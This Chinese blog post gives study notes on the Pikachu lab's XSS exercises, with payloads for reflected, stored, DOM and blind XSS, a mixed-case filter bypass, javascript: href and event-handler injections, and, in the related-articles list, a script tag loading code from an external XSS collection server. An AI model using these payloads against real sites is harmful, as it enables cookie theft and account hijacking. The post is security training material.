pikachu---xss练习1

最新推荐文章于 2024-10-01 13:10:12 发布
最新推荐文章于 2024-10-01 13:10:12 发布
阅读量802 收藏 5
点赞数 1
分类专栏: 学习笔记 文章标签: 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ptxybird/article/details/125439910
版权

一、反射性xss(get)

1、在输入框尝试输入后,发现有长度限制,提交试一下

 2、再去查看源代码,真的有长度限制

 3、修改长度,再输入payload,发现都输入进去了

 4、提交,即弹出xss弹窗 

二、反射型xss(post)

1、直接在输入框中尝试,没有什么回显 

2、尝试登录上去,需要破解账号密码

 

3、爆破得到的账号密码登上去,发现有输入框

 

 4、尝试一下输入payload提交

还可以尝试一下,获取cookie 

 

可以参考以下尝试操作其他

XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)_硬核的无脸man~的博客-CSDN博客_构造xss攻击

 三、存储型xss

1、我一打开就直接弹出xss窗口,一打开就已经成功了,还是来深究一下原因吧,我发现我每点一次确定,就出现一次删除

我尝试输入,再打开源代码查看,发现输入的都是一直存储的

 

在我新输入的内容上往前找,发现之前早就存储有payload,所以今天一打开就出现xss窗口 ,真好验证了存储型xss漏洞的特点,永久存储

 

四、DOM型xss和DOM型xss-x

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

1、在输入框尝试输入payload,发现我们输入的内容会转化成超链接的形式

 2、需要闭合, 以下两行都可以


' onclick="alert('xss')">
'><img src="#" onmouseover="alert('xss')">

DOM型xss-x也是一样的

 五、xss之盲打

XSS盲打简单来说,盲打就是在一切可能的地方尽可能多的提交xss语句,不顾一切的输入xss代码在留言啊,反馈啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式。

2、一猛操作下来,都没有什么回显,只能根据提示登录后台

 后台一登陆,xss窗口就弹出来了

 

六、xss-过滤

1、尝试输入内容,发现会过滤部分输入字符,script都过滤了

 2、可以尝试一下大小写、重写绕过,我这成功的只有大小写绕过

<ScriPT>alert(/xss/)</ScriPT>
<sCRipt>alert(/xss/)</sCRipt>

 七、xss--htmlspecialchars

htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。

1、

点击#'οnclick='alert(/xss/)',弹出xss窗口

 

 

八、xss-href输出

javascript:alert(/xss/)

 

 九、xss-js输出

'</script><script>alert(/xss/)</script>

 

 备注:xss漏洞知识待补充,目前先这样练习一下。

 

 

 

呆愿
关注
专栏目录
XSS练习
haha1314的博客
07-21 884
0x00 function render (input) { return '<div>' + input + '</div>' } 没有丝毫的过滤,且在标签中很简单直接写payload <script>alert(1)</script> 0x01 function render (input) { return...
pikachu---XSS漏洞
m0_52822871的博客
08-31 631
实验环境–pikachu靶机 (记录学习笔记) 一 XSS概述 1.XSS定义 •人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 •跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 2.XSS原理
Pikachu靶场之XSS漏洞详解
Nai_zui_jiang的博客
08-22 718
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览页面时,攻击者插入在页面的Script代码会被解析执行,从而达到恶意攻击的目。
XSS练习
留得半世听茶香的博客
03-05 331
文章转载自:https://blog.csdn.net/Ni9htMar3/article/details/77938899 ...
XSS练习(皮卡湫+XSS-labs+Burpsuit靶场)
weixin_64936150的博客
09-01 1546
发现我们的输入被传入到了href中,绑定给了what do you see,先试一下能不能直接给他闭合了。发现传入的参数一直被包裹,可能有符号被转义了,丢几个常见的闭合个上去看看闭合方式。这关我们登录进来后发现了输入框,还是直接尝试看能否弹窗,发现可以直接xss。测试发现双引号闭合,传入的值仍然在input中,再试一下上一题用到的事件。各种方法都尝试过了,都不可行,看源码发现判断了输入中有没有http://发现全加了下划线,大小写也无法绕过,那就只能看看加密能不能被解析了。
pikachu-master.zip
06-25
Pikachu靶场,正如其名,以其全面的漏洞练习和丰富的实践环节,成为提升网络安全技能的理想平台。 靶场的核心在于模拟实际漏洞,帮助我们理解和应对各种网络威胁。在这个靶场中,你可以接触到如SQL注入、XSS跨站...
pikachu-master靶场
07-14
例如,在"pikachu-master"中,可能包括了不同难度级别的Web渗透测试练习,如SQL注入、XSS跨站脚本、命令注入等。这些练习通常会设置特定的漏洞,学习者需要通过分析HTTP请求、查看源代码、利用漏洞工具等方式来找出...
Xss练习(level1-10)
AmyBaby00的博客
09-04 625
Xss练习 找输入点,输出点,能往页面上写东西,写的东西可以反馈出来。例如:搜索框 “ ”双引号包裹,会被网页源代码 当作普通的字符串。不是代码执行 尖括号成对出现,闭合<> (Xss防护:就是把有危险的词组屏蔽掉) level1 找输入点:在url里面可以看到name=test,只需构造一个基本的语句,执行该语句即name=”这里就是先把input内的双引号和尖括号闭合,然后再写我们...
xss平台练习
A1956936030的博客
10-22 442
1.靶机蓝莲花BLUE-LOTUS http://117.167.136.240:10080/admin.php 默认登录密码:bluelotus 2.靶机网站 http://117.167.136.240:38001/ 找输入口 找到输入口在register 弹出框如下: 添加新的default模板并生成payload 复制payload: <script src="http://117.167.136.240:10080/myjs/s.js"></script> 成
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
XSS】十九道XSS弹窗专项练习
share something here
05-25 3303
XSS专项练习参考项目外观样式0x00 div标签,常规插入0x01 textarea标签 闭合该后插入0x02 内容放在标签内,`">`闭合标签0x03 过滤(),使用反单引号`0x04 过滤括号()和反单引号` 使用html实体编码来绕过0x05 闭合注释符0x06 正则过滤auto/on开头及`=`结尾和`>` 换行绕过匹配0x07 正则匹配,空格绕过解析0x08 换行或空格绕过正则匹配0x09 let 声明,RegExp.test()正则白名单0x0A 升级版0x09过滤后再白名单 参考
xss靶场练习
qq_46804551的博客
11-02 260
- Pass-1 127.0.0.1/xss/level1.php?name=<script>alert(1)</script> 通过 - Pass-2 直接插入不行,引号将其包裹起了 http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><-- - Pass-3 审查元素看看 看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
XSS-labs 实战(练习篇)
qtttgeq的博客
02-18 243
xss Labs通关
xss攻关小练习
一枚努力的蛋蛋
07-21 440
xss攻关小练习第一关第二关第三关 第一关 过关条件 payload: 第二关 这里没有对输入的值实现htmlspecialchars函数梳理,所以直接闭合绕过 在搜索框里输入payload: 第三关 ...
xss练习记录
JDWDXN的博客
10-12 432
level2 构造闭合绕过 校验代码 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$s
pikachu靶场练习XSS(反射型XSS
最新发布
qq_45795768的博客
10-01 869
get型xss的思路是找到存在漏洞的站点,设置一个含有恶意js的payload(比如获取cookie),制作成一个url,将这个url发送给需要攻击的对象,一旦对象点击,就会触发这个payload。post型xss的思路是伪造一个自动提交的页面,html文件里包含了payload,我们只需要吸引被攻击者访问这个页面,就能实现我们的的攻击。
[ pikachu ] 靶场通关之 XSS (三) --- 存储型 XSS
qq_51577576的博客
01-14 2713
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、存储型 XSS 二、过关: 1. 页面展示 2. 判断是否存在 XSS
pikachu-master
08-16
pikachu-master是一个带有漏洞的Web应用系统,可以用于进行web安全漏洞的练习学习。你可以从GitHub上下载pikachu-master的源码,并将其上传到你的Web服务器的根目录下。然后,你可以通过访问服务器的IP地址加上pikachu-master的路径来访问这个靶场,例如http://192.168.132.131/pikachu-master/。在安装和配置pikachu-master时,你需要确保Apache和MySQL服务开启,并将pikachu-master文件夹放置在xampp安装目录的htdocs文件夹下,并将config.inc.php文件中的数据库连接信息修改为你实际的数据库连接信息。在安装和配置完成后,你可以通过127.0.0.1/pikachu-master路径来访问这个靶场。在访问之前,你可以通过phpmyadmin来修改数据库账号和密码。请注意,解压pikachu-master文件时会生成两个文件夹,所以路径是127.0.0.1/pikachu-master/pikachu-master。pikachu-master提供了综合类型的靶场练习环境,涵盖了多种漏洞,适合进一步加强你的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Linux--linux部署pikachu靶场-kali-部署靶场(详细讲解)](https://blog.csdn.net/qq_56664029/article/details/129888616)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [pikachu实验靶场环境部署](https://blog.csdn.net/qq_40731934/article/details/130676513)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [pikachu-master.zip](https://download.csdn.net/download/BROTHERYY/12550852)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值